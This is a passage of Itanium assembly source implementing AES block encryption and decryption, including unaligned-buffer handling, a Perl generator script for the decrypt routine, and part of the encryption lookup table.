{ .mmi; ld1 te03=[te03] // 7/3:te0[s3>>24]
add te32=te32,te0 // 7/3:te0+s2
and te13=te13,maskff};; // 7/2:s3>>16&0xff
{ .mmi; ld1 te31=[te31] // 8/2:te0[s1]
add te13=te13,te0 // 8/2:te0+s3>>16
dep te30=te23,te30,8,8} // 8/1:
{ .mmi; ld1 te32=[te32] // 8/3:te0[s2]
add te10=te10,te0 // 8/3:te0+s0>>16
shl te00=te00,twenty4};; // 8/0:
{ .mii; ld1 te13=[te13] // 9/2:te0[s3>>16]
dep te33=te11,te33,16,8 // 9/0:
shl te01=te01,twenty4};; // 9/1:
{ .mii; ld1 te10=[te10] // 10/3:te0[s0>>16]
dep te31=te20,te31,8,8 // 10/2:
shl te02=te02,twenty4};; // 10/2:
{ .mii; xor t0=t0,te33 // 11/0:
dep te32=te21,te32,8,8 // 11/3:
shl te12=te12,sixteen};; // 11/1:
{ .mii; xor r16=t0,te00 // 12/0:done!
dep te31=te13,te31,16,8 // 12/2:
shl te03=te03,twenty4};; // 12/3:
{ .mmi; xor t1=t1,te01 // 13/1:
xor t2=t2,te02 // 13/2:
dep te32=te10,te32,16,8};; // 13/3:
{ .mmi; xor t1=t1,te30 // 14/1:
xor r24=t2,te31 // 14/2:done!
xor t3=t3,te32 };; // 14/3:
{ .mib; xor r20=t1,te12 // 15/1:done!
xor r28=t3,te03 // 15/3:done!
br.ret.sptk b6 };;
.endp _ia64_AES_encrypt#
// void AES_encrypt (const void *in,void *out,const AES_KEY *key);
.global AES_encrypt#
.proc AES_encrypt#
.align 32
AES_encrypt:
.prologue
.save ar.pfs,pfssave
{ .mmi; alloc pfssave=ar.pfs,3,1,12,0
and out0=3,in0
mov r3=ip }
{ .mmi; ADDP in0=0,in0
mov loc0=psr.um
ADDP out11=KSZ*60,in2 };; // &AES_KEY->rounds
{ .mmi; ld4 out11=[out11] // AES_KEY->rounds
add out8=(AES_Te#-AES_encrypt#),r3 // Te0
.save pr,prsave
mov prsave=pr }
{ .mmi; rum 1<<3 // clear um.ac
.save ar.lc,lcsave
mov lcsave=ar.lc };;
.body
#if defined(_HPUX_SOURCE) // HPUX is big-endian, cut 15+15 cycles...
{ .mib; cmp.ne p6,p0=out0,r0
add out0=4,in0
(p6) br.dpnt.many .Le_i_unaligned };;
{ .mmi; ld4 out1=[in0],8 // s0
and out9=3,in1
mov twenty4=24 }
{ .mmi; ld4 out3=[out0],8 // s1
ADDP rk0=0,in2
mov sixteen=16 };;
{ .mmi; ld4 out5=[in0] // s2
cmp.ne p6,p0=out9,r0
mov maskff=0xff }
{ .mmb; ld4 out7=[out0] // s3
ADDP rk1=KSZ,in2
br.call.sptk.many b6=_ia64_AES_encrypt };;
{ .mib; ADDP in0=4,in1
ADDP in1=0,in1
(p6) br.spnt .Le_o_unaligned };;
{ .mii; mov psr.um=loc0
mov ar.pfs=pfssave
mov ar.lc=lcsave };;
{ .mmi; st4 [in1]=r16,8 // s0
st4 [in0]=r20,8 // s1
mov pr=prsave,0x1ffff };;
{ .mmb; st4 [in1]=r24 // s2
st4 [in0]=r28 // s3
br.ret.sptk.many b0 };;
#endif
.align 32
.Le_i_unaligned:
{ .mmi; add out0=1,in0
add out2=2,in0
add out4=3,in0 };;
{ .mmi; ld1 r16=[in0],4
ld1 r17=[out0],4 }//;;
{ .mmi; ld1 r18=[out2],4
ld1 out1=[out4],4 };; // s0
{ .mmi; ld1 r20=[in0],4
ld1 r21=[out0],4 }//;;
{ .mmi; ld1 r22=[out2],4
ld1 out3=[out4],4 };; // s1
{ .mmi; ld1 r24=[in0],4
ld1 r25=[out0],4 }//;;
{ .mmi; ld1 r26=[out2],4
ld1 out5=[out4],4 };; // s2
{ .mmi; ld1 r28=[in0]
ld1 r29=[out0] }//;;
{ .mmi; ld1 r30=[out2]
ld1 out7=[out4] };; // s3
{ .mii;
dep out1=r16,out1,24,8 //;;
dep out3=r20,out3,24,8 }//;;
{ .mii; ADDP rk0=0,in2
dep out5=r24,out5,24,8 //;;
dep out7=r28,out7,24,8 };;
{ .mii; ADDP rk1=KSZ,in2
dep out1=r17,out1,16,8 //;;
dep out3=r21,out3,16,8 }//;;
{ .mii; mov twenty4=24
dep out5=r25,out5,16,8 //;;
dep out7=r29,out7,16,8 };;
{ .mii; mov sixteen=16
dep out1=r18,out1,8,8 //;;
dep out3=r22,out3,8,8 }//;;
{ .mii; mov maskff=0xff
dep out5=r26,out5,8,8 //;;
dep out7=r30,out7,8,8 };;
{ .mib; br.call.sptk.many b6=_ia64_AES_encrypt };;
.Le_o_unaligned:
{ .mii; ADDP out0=0,in1
extr.u r17=r16,8,8 // s0
shr.u r19=r16,twenty4 }//;;
{ .mii; ADDP out1=1,in1
extr.u r18=r16,16,8
shr.u r23=r20,twenty4 }//;; // s1
{ .mii; ADDP out2=2,in1
extr.u r21=r20,8,8
shr.u r22=r20,sixteen }//;;
{ .mii; ADDP out3=3,in1
extr.u r25=r24,8,8 // s2
shr.u r27=r24,twenty4 };;
{ .mii; st1 [out3]=r16,4
extr.u r26=r24,16,8
shr.u r31=r28,twenty4 }//;; // s3
{ .mii; st1 [out2]=r17,4
extr.u r29=r28,8,8
shr.u r30=r28,sixteen }//;;
{ .mmi; st1 [out1]=r18,4
st1 [out0]=r19,4 };;
{ .mmi; st1 [out3]=r20,4
st1 [out2]=r21,4 }//;;
{ .mmi; st1 [out1]=r22,4
st1 [out0]=r23,4 };;
{ .mmi; st1 [out3]=r24,4
st1 [out2]=r25,4
mov pr=prsave,0x1ffff }//;;
{ .mmi; st1 [out1]=r26,4
st1 [out0]=r27,4
mov ar.pfs=pfssave };;
{ .mmi; st1 [out3]=r28
st1 [out2]=r29
mov ar.lc=lcsave }//;;
{ .mmi; st1 [out1]=r30
st1 [out0]=r31 }
{ .mfb; mov psr.um=loc0 // restore user mask
br.ret.sptk.many b0 };;
.endp AES_encrypt#
// *AES_decrypt are autogenerated by the following script:
#if 0
#!/usr/bin/env perl
print "// *AES_decrypt are autogenerated by the following script:\n#if 0\n";
open(PROG,'<'.$0); while(<PROG>) { print; } close(PROG);
print "#endif\n";
while(<>) {
$process=1 if (/\.proc\s+_ia64_AES_encrypt/);
next if (!$process);
#s/te00=s0/td00=s0/; s/te00/td00/g;
s/te11=s1/td13=s3/; s/te11/td13/g;
#s/te22=s2/td22=s2/; s/te22/td22/g;
s/te33=s3/td31=s1/; s/te33/td31/g;
#s/te01=s1/td01=s1/; s/te01/td01/g;
s/te12=s2/td10=s0/; s/te12/td10/g;
#s/te23=s3/td23=s3/; s/te23/td23/g;
s/te30=s0/td32=s2/; s/te30/td32/g;
#s/te02=s2/td02=s2/; s/te02/td02/g;
s/te13=s3/td11=s1/; s/te13/td11/g;
#s/te20=s0/td20=s0/; s/te20/td20/g;
s/te31=s1/td33=s3/; s/te31/td33/g;
#s/te03=s3/td03=s3/; s/te03/td03/g;
s/te10=s0/td12=s2/; s/te10/td12/g;
#s/te21=s1/td21=s1/; s/te21/td21/g;
s/te32=s2/td30=s0/; s/te32/td30/g;
s/td/te/g;
s/AES_encrypt/AES_decrypt/g;
s/\.Le_/.Ld_/g;
s/AES_Te#/AES_Td#/g;
print;
exit if (/\.endp\s+AES_decrypt/);
}
#endif
.proc _ia64_AES_decrypt#
// Input: rk0-rk1
// te0
// te3 as AES_KEY->rounds!!!
// s0-s3
// maskff,twenty4,sixteen
// Output: r16,r20,r24,r28 as s0-s3
// Clobber: r16-r31,rk0-rk1,r32-r43
.align 32
_ia64_AES_decrypt:
.prologue
.altrp b6
.body
{ .mmi; alloc r16=ar.pfs,12,0,0,8
LDKEY t0=[rk0],2*KSZ
mov pr.rot=1<<16 }
{ .mmi; LDKEY t1=[rk1],2*KSZ
add te1=TE1,te0
add te3=-3,te3 };;
{ .mib; LDKEY t2=[rk0],2*KSZ
mov ar.ec=2 }
{ .mib; LDKEY t3=[rk1],2*KSZ
add te2=TE2,te0
brp.loop.imp .Ld_top,.Ld_end-16 };;
{ .mmi; xor s0=s0,t0
xor s1=s1,t1
mov ar.lc=te3 }
{ .mmi; xor s2=s2,t2
xor s3=s3,t3
add te3=TE3,te0 };;
.align 32
.Ld_top:
{ .mmi; (p0) LDKEY t0=[rk0],2*KSZ // 0/0:rk[0]
(p0) and te31=s1,maskff // 0/0:s3&0xff
(p0) extr.u te22=s2,8,8 } // 0/0:s2>>8&0xff
{ .mmi; (p0) LDKEY t1=[rk1],2*KSZ // 0/1:rk[1]
(p0) and te32=s2,maskff // 0/1:s0&0xff
(p0) shr.u te00=s0,twenty4 };; // 0/0:s0>>24
{ .mmi; (p0) LDKEY t2=[rk0],2*KSZ // 1/2:rk[2]
(p0) shladd te31=te31,3,te3 // 1/0:te0+s0>>24
(p0) extr.u te23=s3,8,8 } // 1/1:s3>>8&0xff
{ .mmi; (p0) LDKEY t3=[rk1],2*KSZ // 1/3:rk[3]
(p0) shladd te32=te32,3,te3 // 1/1:te3+s0
(p0) shr.u te01=s1,twenty4 };; // 1/1:s1>>24
{ .mmi; (p0) ld4 te31=[te31] // 2/0:te3[s3&0xff]
(p0) shladd te22=te22,3,te2 // 2/0:te2+s2>>8&0xff
(p0) extr.u te20=s0,8,8 } // 2/2:s0>>8&0xff
{ .mmi; (p0) ld4 te32=[te32] // 2/1:te3[s0]
(p0) shladd te23=te23,3,te2 // 2/1:te2+s3>>8
(p0) shr.u te02=s2,twenty4 };; // 2/2:s2>>24
{ .mmi; (p0) ld4 te22=[te22] // 3/0:te2[s2>>8]
(p0) shladd te20=te20,3,te2 // 3/2:te2+s0>>8
(p0) extr.u te21=s1,8,8 } // 3/3:s1>>8&0xff
{ .mmi; (p0) ld4 te23=[te23] // 3/1:te2[s3>>8]
(p0) shladd te00=te00,3,te0 // 3/0:te0+s0>>24
(p0) shr.u te03=s3,twenty4 };; // 3/3:s3>>24
{ .mmi; (p0) ld4 te20=[te20] // 4/2:te2[s0>>8]
(p0) shladd te21=te21,3,te2 // 4/3:te3+s2
(p0) extr.u te13=s3,16,8 } // 4/0:s1>>16&0xff
{ .mmi; (p0) ld4 te00=[te00] // 4/0:te0[s0>>24]
(p0) shladd te01=te01,3,te0 // 4/1:te0+s1>>24
(p0) shr.u te11=s1,sixteen };; // 4/2:s3>>16
{ .mmi; (p0) ld4 te21=[te21] // 5/3:te2[s1>>8]
(p0) shladd te13=te13,3,te1 // 5/0:te1+s1>>16
(p0) extr.u te10=s0,16,8 } // 5/1:s2>>16&0xff
{ .mmi; (p0) ld4 te01=[te01] // 5/1:te0[s1>>24]
(p0) shladd te02=te02,3,te0 // 5/2:te0+s2>>24
(p0) and te33=s3,maskff };; // 5/2:s1&0xff
{ .mmi; (p0) ld4 te13=[te13] // 6/0:te1[s1>>16]
(p0) shladd te10=te10,3,te1 // 6/1:te1+s2>>16
(p0) extr.u te12=s2,16,8 } // 6/3:s0>>16&0xff
{ .mmi; (p0) ld4 te02=[te02] // 6/2:te0[s2>>24]
(p0) shladd te03=te03,3,te0 // 6/3:te1+s0>>16
(p0) and te30=s0,maskff };; // 6/3:s2&0xff
{ .mmi; (p0) ld4 te10=[te10] // 7/1:te1[s2>>16]
(p0) shladd te33=te33,3,te3 // 7/2:te3+s1&0xff
(p0) and te11=te11,maskff} // 7/2:s3>>16&0xff
{ .mmi; (p0) ld4 te03=[te03] // 7/3:te0[s3>>24]
(p0) shladd te30=te30,3,te3 // 7/3:te3+s2
(p0) xor t0=t0,te31 };; // 7/0:
{ .mmi; (p0) ld4 te33=[te33] // 8/2:te3[s1]
(p0) shladd te11=te11,3,te1 // 8/2:te1+s3>>16
(p0) xor t0=t0,te22 } // 8/0:
{ .mmi; (p0) ld4 te30=[te30] // 8/3:te3[s2]
(p0) shladd te12=te12,3,te1 // 8/3:te1+s0>>16
(p0) xor t1=t1,te32 };; // 8/1:
{ .mmi; (p0) ld4 te11=[te11] // 9/2:te1[s3>>16]
(p0) ld4 te12=[te12] // 9/3:te1[s0>>16]
(p0) xor t0=t0,te00 };; // 9/0: !L2 scheduling
{ .mmi; (p0) xor t1=t1,te23 // 10[9]/1:
(p0) xor t2=t2,te20 // 10[9]/2:
(p0) xor t3=t3,te21 };; // 10[9]/3:
{ .mmi; (p0) xor t0=t0,te13 // 11[10]/0:done!
(p0) xor t1=t1,te01 // 11[10]/1:
(p0) xor t2=t2,te02 };; // 11[10]/2: !L2 scheduling
{ .mmi; (p0) xor t3=t3,te03 // 12[10]/3:
(p16) cmp.eq p0,p17=r0,r0 };; // 12[10]/clear (p17)
{ .mmi; (p0) xor t1=t1,te10 // 13[11]/1:done!
(p0) xor t2=t2,te33 // 13[11]/2:
(p0) xor t3=t3,te30 } // 13[11]/3:
{ .mmi; (p17) add te0=2048,te0 // 13[11]/
(p17) add te1=2048+64-TE1,te1};; // 13[11]/
{ .mib; (p0) xor t2=t2,te11 // 14[12]/2:done!
(p17) add te2=2048+128-TE2,te2} // 14[12]/
{ .mib; (p0) xor t3=t3,te12 // 14[12]/3:done!
(p17) add te3=2048+192-TE3,te3 // 14[12]/
br.ctop.sptk .Ld_top };;
.Ld_end:
{ .mmi; ld8 te10=[te0] // prefetch Td4
ld8 te33=[te1] }
{ .mmi; ld8 te12=[te2]
ld8 te30=[te3] }
{ .mmi; LDKEY t0=[rk0],2*KSZ // 0/0:rk[0]
and te31=s1,maskff // 0/0:s3&0xff
extr.u te22=s2,8,8 } // 0/0:s2>>8&0xff
{ .mmi; LDKEY t1=[rk1],2*KSZ // 0/1:rk[1]
and te32=s2,maskff // 0/1:s0&0xff
shr.u te00=s0,twenty4 };; // 0/0:s0>>24
{ .mmi; LDKEY t2=[rk0],2*KSZ // 1/2:rk[2]
add te31=te31,te0 // 1/0:te0+s0>>24
extr.u te23=s3,8,8 } // 1/1:s3>>8&0xff
{ .mmi; LDKEY t3=[rk1],2*KSZ // 1/3:rk[3]
add te32=te32,te0 // 1/1:te0+s0
shr.u te01=s1,twenty4 };; // 1/1:s1>>24
{ .mmi; ld1 te31=[te31] // 2/0:te0[s3&0xff]
add te22=te22,te0 // 2/0:te0+s2>>8&0xff
extr.u te20=s0,8,8 } // 2/2:s0>>8&0xff
{ .mmi; ld1 te32=[te32] // 2/1:te0[s0]
add te23=te23,te0 // 2/1:te0+s3>>8
shr.u te02=s2,twenty4 };; // 2/2:s2>>24
{ .mmi; ld1 te22=[te22] // 3/0:te0[s2>>8]
add te20=te20,te0 // 3/2:te0+s0>>8
extr.u te21=s1,8,8 } // 3/3:s1>>8&0xff
{ .mmi; ld1 te23=[te23] // 3/1:te0[s3>>8]
add te00=te00,te0 // 3/0:te0+s0>>24
shr.u te03=s3,twenty4 };; // 3/3:s3>>24
{ .mmi; ld1 te20=[te20] // 4/2:te0[s0>>8]
add te21=te21,te0 // 4/3:te0+s2
extr.u te13=s3,16,8 } // 4/0:s1>>16&0xff
{ .mmi; ld1 te00=[te00] // 4/0:te0[s0>>24]
add te01=te01,te0 // 4/1:te0+s1>>24
shr.u te11=s1,sixteen };; // 4/2:s3>>16
{ .mmi; ld1 te21=[te21] // 5/3:te0[s1>>8]
add te13=te13,te0 // 5/0:te0+s1>>16
extr.u te10=s0,16,8 } // 5/1:s2>>16&0xff
{ .mmi; ld1 te01=[te01] // 5/1:te0[s1>>24]
add te02=te02,te0 // 5/2:te0+s2>>24
and te33=s3,maskff };; // 5/2:s1&0xff
{ .mmi; ld1 te13=[te13] // 6/0:te0[s1>>16]
add te10=te10,te0 // 6/1:te0+s2>>16
extr.u te12=s2,16,8 } // 6/3:s0>>16&0xff
{ .mmi; ld1 te02=[te02] // 6/2:te0[s2>>24]
add te03=te03,te0 // 6/3:te0+s0>>16
and te30=s0,maskff };; // 6/3:s2&0xff
{ .mmi; ld1 te10=[te10] // 7/1:te0[s2>>16]
add te33=te33,te0 // 7/2:te0+s1&0xff
dep te31=te22,te31,8,8} // 7/0:
{ .mmi; ld1 te03=[te03] // 7/3:te0[s3>>24]
add te30=te30,te0 // 7/3:te0+s2
and te11=te11,maskff};; // 7/2:s3>>16&0xff
{ .mmi; ld1 te33=[te33] // 8/2:te0[s1]
add te11=te11,te0 // 8/2:te0+s3>>16
dep te32=te23,te32,8,8} // 8/1:
{ .mmi; ld1 te30=[te30] // 8/3:te0[s2]
add te12=te12,te0 // 8/3:te0+s0>>16
shl te00=te00,twenty4};; // 8/0:
{ .mii; ld1 te11=[te11] // 9/2:te0[s3>>16]
dep te31=te13,te31,16,8 // 9/0:
shl te01=te01,twenty4};; // 9/1:
{ .mii; ld1 te12=[te12] // 10/3:te0[s0>>16]
dep te33=te20,te33,8,8 // 10/2:
shl te02=te02,twenty4};; // 10/2:
{ .mii; xor t0=t0,te31 // 11/0:
dep te30=te21,te30,8,8 // 11/3:
shl te10=te10,sixteen};; // 11/1:
{ .mii; xor r16=t0,te00 // 12/0:done!
dep te33=te11,te33,16,8 // 12/2:
shl te03=te03,twenty4};; // 12/3:
{ .mmi; xor t1=t1,te01 // 13/1:
xor t2=t2,te02 // 13/2:
dep te30=te12,te30,16,8};; // 13/3:
{ .mmi; xor t1=t1,te32 // 14/1:
xor r24=t2,te33 // 14/2:done!
xor t3=t3,te30 };; // 14/3:
{ .mib; xor r20=t1,te10 // 15/1:done!
xor r28=t3,te03 // 15/3:done!
br.ret.sptk b6 };;
.endp _ia64_AES_decrypt#
// void AES_decrypt (const void *in,void *out,const AES_KEY *key);
.global AES_decrypt#
.proc AES_decrypt#
.align 32
AES_decrypt:
.prologue
.save ar.pfs,pfssave
{ .mmi; alloc pfssave=ar.pfs,3,1,12,0
and out0=3,in0
mov r3=ip }
{ .mmi; ADDP in0=0,in0
mov loc0=psr.um
ADDP out11=KSZ*60,in2 };; // &AES_KEY->rounds
{ .mmi; ld4 out11=[out11] // AES_KEY->rounds
add out8=(AES_Td#-AES_decrypt#),r3 // Te0
.save pr,prsave
mov prsave=pr }
{ .mmi; rum 1<<3 // clear um.ac
.save ar.lc,lcsave
mov lcsave=ar.lc };;
.body
#if defined(_HPUX_SOURCE) // HPUX is big-endian, cut 15+15 cycles...
{ .mib; cmp.ne p6,p0=out0,r0
add out0=4,in0
(p6) br.dpnt.many .Ld_i_unaligned };;
{ .mmi; ld4 out1=[in0],8 // s0
and out9=3,in1
mov twenty4=24 }
{ .mmi; ld4 out3=[out0],8 // s1
ADDP rk0=0,in2
mov sixteen=16 };;
{ .mmi; ld4 out5=[in0] // s2
cmp.ne p6,p0=out9,r0
mov maskff=0xff }
{ .mmb; ld4 out7=[out0] // s3
ADDP rk1=KSZ,in2
br.call.sptk.many b6=_ia64_AES_decrypt };;
{ .mib; ADDP in0=4,in1
ADDP in1=0,in1
(p6) br.spnt .Ld_o_unaligned };;
{ .mii; mov psr.um=loc0
mov ar.pfs=pfssave
mov ar.lc=lcsave };;
{ .mmi; st4 [in1]=r16,8 // s0
st4 [in0]=r20,8 // s1
mov pr=prsave,0x1ffff };;
{ .mmb; st4 [in1]=r24 // s2
st4 [in0]=r28 // s3
br.ret.sptk.many b0 };;
#endif
.align 32
.Ld_i_unaligned:
{ .mmi; add out0=1,in0
add out2=2,in0
add out4=3,in0 };;
{ .mmi; ld1 r16=[in0],4
ld1 r17=[out0],4 }//;;
{ .mmi; ld1 r18=[out2],4
ld1 out1=[out4],4 };; // s0
{ .mmi; ld1 r20=[in0],4
ld1 r21=[out0],4 }//;;
{ .mmi; ld1 r22=[out2],4
ld1 out3=[out4],4 };; // s1
{ .mmi; ld1 r24=[in0],4
ld1 r25=[out0],4 }//;;
{ .mmi; ld1 r26=[out2],4
ld1 out5=[out4],4 };; // s2
{ .mmi; ld1 r28=[in0]
ld1 r29=[out0] }//;;
{ .mmi; ld1 r30=[out2]
ld1 out7=[out4] };; // s3
{ .mii;
dep out1=r16,out1,24,8 //;;
dep out3=r20,out3,24,8 }//;;
{ .mii; ADDP rk0=0,in2
dep out5=r24,out5,24,8 //;;
dep out7=r28,out7,24,8 };;
{ .mii; ADDP rk1=KSZ,in2
dep out1=r17,out1,16,8 //;;
dep out3=r21,out3,16,8 }//;;
{ .mii; mov twenty4=24
dep out5=r25,out5,16,8 //;;
dep out7=r29,out7,16,8 };;
{ .mii; mov sixteen=16
dep out1=r18,out1,8,8 //;;
dep out3=r22,out3,8,8 }//;;
{ .mii; mov maskff=0xff
dep out5=r26,out5,8,8 //;;
dep out7=r30,out7,8,8 };;
{ .mib; br.call.sptk.many b6=_ia64_AES_decrypt };;
.Ld_o_unaligned:
{ .mii; ADDP out0=0,in1
extr.u r17=r16,8,8 // s0
shr.u r19=r16,twenty4 }//;;
{ .mii; ADDP out1=1,in1
extr.u r18=r16,16,8
shr.u r23=r20,twenty4 }//;; // s1
{ .mii; ADDP out2=2,in1
extr.u r21=r20,8,8
shr.u r22=r20,sixteen }//;;
{ .mii; ADDP out3=3,in1
extr.u r25=r24,8,8 // s2
shr.u r27=r24,twenty4 };;
{ .mii; st1 [out3]=r16,4
extr.u r26=r24,16,8
shr.u r31=r28,twenty4 }//;; // s3
{ .mii; st1 [out2]=r17,4
extr.u r29=r28,8,8
shr.u r30=r28,sixteen }//;;
{ .mmi; st1 [out1]=r18,4
st1 [out0]=r19,4 };;
{ .mmi; st1 [out3]=r20,4
st1 [out2]=r21,4 }//;;
{ .mmi; st1 [out1]=r22,4
st1 [out0]=r23,4 };;
{ .mmi; st1 [out3]=r24,4
st1 [out2]=r25,4
mov pr=prsave,0x1ffff }//;;
{ .mmi; st1 [out1]=r26,4
st1 [out0]=r27,4
mov ar.pfs=pfssave };;
{ .mmi; st1 [out3]=r28
st1 [out2]=r29
mov ar.lc=lcsave }//;;
{ .mmi; st1 [out1]=r30
st1 [out0]=r31 }
{ .mfb; mov psr.um=loc0 // restore user mask
br.ret.sptk.many b0 };;
.endp AES_decrypt#
// leave it in .text segment...
.align 64
.global AES_Te#
.type AES_Te#,@object
AES_Te: data4 0xc66363a5,0xc66363a5, 0xf87c7c84,0xf87c7c84
data4 0xee777799,0xee777799, 0xf67b7b8d,0xf67b7b8d
data4 0xfff2f20d,0xfff2f20d, 0xd66b6bbd,0xd66b6bbd
data4 0xde6f6fb1,0xde6f6fb1, 0x91c5c554,0x91c5c554
data4 0x60303050,0x60303050, 0x02010103,0x02010103
data4 0xce6767a9,0xce6767a9, 0x562b2b7d,0x562b2b7d
data4 0xe7fefe19,0xe7fefe19, 0xb5d7d762,0xb5d7d762
data4 0x4dababe6,0x4dababe6, 0xec76769a,0xec76769a
data4 0x8fcaca45,0x8fcaca45, 0x1f82829d,0x1f82829d
data4 0x89c9c940,0x89c9c940, 0xfa7d7d87,0xfa7d7d87
data4 0xeffafa15,0xeffafa15, 0xb25959eb,0xb25959eb
data4 0x8e4747c9,0x8e4747c9, 0xfbf0f00b,0xfbf0f00b
data4 0x41adadec,0x41adadec, 0xb3d4d467,0xb3d4d467
data4 0x5fa2a2fd,0x5fa2a2fd, 0x45afafea,0x45afafea
data4 0x239c9cbf,0x239c9cbf, 0x53a4a4f7,0x53a4a4f7
data4 0xe4727296,0xe4727296, 0x9bc0c05b,0x9bc0c05b
data4 0x75b7b7c2,0x75b7b7c2, 0xe1fdfd1c,0xe1fdfd1c
data4 0x3d9393ae,0x3d9393ae, 0x4c26266a,0x4c26266a
data4 0x6c36365a,0x6c36365a, 0x7e3f3f41,0x7e3f3f41
data4 0xf5f7f702,0xf5f7f702, 0x83cccc4f,0x83cccc4f
data4 0x6834345c,0x6834345c, 0x51a5a5f4,0x51a5a5f4
data4 0xd1e5e534,0xd1e5e534, 0xf9f1f108,0xf9f1f108
data4 0xe2717193,0xe2717193, 0xabd8d873,0xabd8d873
data4 0x62313153,0x62313153, 0x2a15153f,0x2a15153f
data4 0x0804040c,0x0804040c, 0x95c7c752,0x95c7c752
data4 0x46232365,0x46232365, 0x9dc3c35e,0x9dc3c35e
data4 0x30181828,0x30181828, 0x379696a1,0x379696a1
data4 0x0a05050f,0x0a05050f, 0x2f9a9ab5,0x2f9a9ab5
data4 0x0e070709,0x0e070709, 0x24121236,0x24121236
data4 0x1b80809b,0x1b80809b, 0xdfe2e23d,0xdfe2e23d
data4 0xcdebeb26,0xcdebeb26, 0x4e272769,0x4e272769
data4 0x7fb2b2cd,0x7fb2b2cd, 0xea75759f,0xea75759f
data4 0x1209091b,0x1209091b, 0x1d83839e,0x1d83839e
data4 0x582c2c74,0x582c2c74, 0x341a1a2e,0x341a1a2e
data4 0x361b1b2d,0x361b1b2d, 0xdc6e6eb2,0xdc6e6eb2
data4 0xb45a5aee,0xb45a5aee, 0x5ba0a0fb,0x5ba0a0fb
data4 0xa45252f6,0xa45252f6, 0x763b3b4d,0x763b3b4d
data4 0xb7d6d661,0xb7d6d661, 0x7db3b3ce,0x7db3b3ce
data4 0x5229297b,0x5229297b, 0xdde3e33e,0xdde3e33e
data4 0x5e2f2f71,0x5e2f2f71, 0x13848497,0x13848497
data4 0xa65353f5,0xa65353f5, 0xb9d1d168,0xb9d1d168
data4 0x00000000,0x00000000, 0xc1eded2c,0xc1eded2c
data4 0x40202060,0x40202060, 0xe3fcfc1f,0xe3fcfc1f
data4 0x79b1b1c8,0x79b1b1c8, 0xb65b5bed,0xb65b5bed
data4 0xd46a6abe,0xd46a6abe, 0x8dcbcb46,0x8dcbcb46
data4 0x67bebed9,0x67bebed9, 0x7239394b,0x7239394b
data4 0x944a4ade,0x944a4ade, 0x984c4cd4,0x984c4cd4
data4 0xb05858e8,0xb05858e8, 0x85cfcf4a,0x85cfcf4a
data4 0xbbd0d06b,0xbbd0d06b, 0xc5efef2a,0xc5efef2a
data4 0x4faaaae5,0x4faaaae5, 0xedfbfb16,0xedfbfb16
data4 0x864343c5,0x864343c5, 0x9a4d4dd7,0x9a4d4dd7
data4 0x66333355,0x66333355, 0x11858594,0x11858594
data4 0x8a4545cf,0x8a4545cf, 0xe9f9f910,0xe9f9f910
data4 0x04020206,0x04020206, 0xfe7f7f81,0xfe7f7f81
data4 0xa05050f0,0xa05050f0, 0x783c3c44,0x783c3c44
data4 0x259f9fba,0x259f9fba, 0x4ba8a8e3,0x4ba8a8e3
data4 0xa25151f3,0xa25151f3, 0x5da3a3fe,0x5da3a3fe
data4 0x804040c0,0x804040c0, 0x058f8f8a,0x058f8f8a
data4 0x3f9292ad,0x3f9292ad, 0x219d9dbc,0x219d9dbc
data4 0x70383848,0x70383848, 0xf1f5f504,0xf1f5f504
data4 0x63bcbcdf,0x63bcbcdf, 0x77b6b6c1,0x77b6b6c1
data4 0xafdada75,0xafdada75, 0x42212163,0x42212163
data4 0x20101030,0x20101030, 0xe5ffff1a,0xe5ffff1a
data4 0xfdf3f30e,0xfdf3f30e, 0xbfd2d26d,0xbfd2d26d
data4 0x81cdcd4c,0x81cdcd4c, 0x180c0c14,0x180c0c14
data4 0x26131335,0x26131335, 0xc3ecec2f,0xc3ecec2f
data4 0xbe5f5fe1,0xbe5f5fe1, 0x359797a2,0x359797a2
data4 0x884444cc,0x884444cc, 0x2e171739,0x2e171739
data4 0x93c4c457,0x93c4c457, 0x55a7a7f2,0x55a7a7f2
data4 0xfc7e7e82,0xfc7e7e82, 0x7a3d3d47,0x7a3d3d47
data4 0xc86464ac,0xc86464ac, 0xba5d5de7,0xba5d5de7
data4 0x3219192b,0x3219192b, 0xe6737395,0xe6737395
data4 0xc06060a0,0xc06060a0, 0x19818198,0x19818198
data4 0x9e4f4fd1,0x9e4f4fd1, 0xa3dcdc7f,0xa3dcdc7f
data4 0x44222266,0x44222266, 0x542a2a7e,0x542a2a7e
data4 0x3b9090ab,0x3b9090ab, 0x0b888883,0x0b888883
data4 0x8c4646ca,0x8c4646ca, 0xc7eeee29,0xc7eeee29
data4 0x6bb8b8d3,0x6bb8b8d3, 0x2814143c,0x2814143c
data4 0xa7dede79,0xa7dede79, 0xbc5e5ee2,0xbc5e5ee2
data4 0x160b0b1d,0x160b0b1d, 0xaddbdb76,0xaddbdb76
data4 0xdbe0e03b,0xdbe0e03b, 0x64323256,0x64323256
data4 0x743a3a4e,0x743a3a4e, 0x140a0a1e,0x140a0a1e
data4 0x924949db,0x924949db, 0x0c06060a,0x0c06060a
data4 0x4824246c,0x4824246c, 0xb85c5ce4,0xb85c5ce4
data4 0x9fc2c25d,0x9fc2c25d, 0xbdd3d36e,0xbdd3d36e
data4 0x43acacef,0x43acacef, 0xc46262a6,0xc46262a6
data4 0x399191a8,0x399191a8, 0x319595a4,0x319595a4
data4 0xd3e4e437,0xd3e4e437, 0xf279798b,0xf279798b
data4 0xd5e7e732,0xd5e7e732, 0x8bc8c843,0x8bc8c843
data4 0x6e373759,0x6e373759, 0xda6d6db7,0xda6d6db7
data4 0x018d8d8c,0x018d8d8c, 0xb1d5d564,0xb1d5d564
data4 0x9c4e4ed2,0x9c4e4ed2, 0x49a9a9e0,0x49a9a9e0
data4 0xd86c6cb4,0xd86c6cb4, 0xac5656fa,0xac5656fa
data4 0xf3f4f407,0xf3f4f407, 0xcfeaea25,0xcfeaea25
data4 0xca6565af,0xca6565af, 0xf47a7a8e,0xf47a7a8e
data4 0x47aeaee9,0x47aeaee9, 0x10080818,0x10080818
data4 0x6fbabad5,0x6fbabad5, 0xf0787888,0xf0787888
data4 0x4a25256f,0x4a25256f, 0x5c2e2e72,0x5c2e2e72
data4 0x381c1c24,0x381c1c24, 0x57a6a6f1,0x57a6a6f1
data4 0x73b4b4c7,0x73b4b4c7, 0x97c6c651,0x97c6c651
data4 0xcbe8e823,0xcbe8e823, 0xa1dddd7c,0xa1dddd7c
data4 0xe874749c,0xe874749c, 0x3e1f1f21,0x3e1f1f21
data4 0x964b4bdd,0x964b4bdd, 0x61bdbddc,0x61bdbddc
data4 0x0d8b8b86,0x0d8b8b86, 0x0f8a8a85,0x0f8a8a85
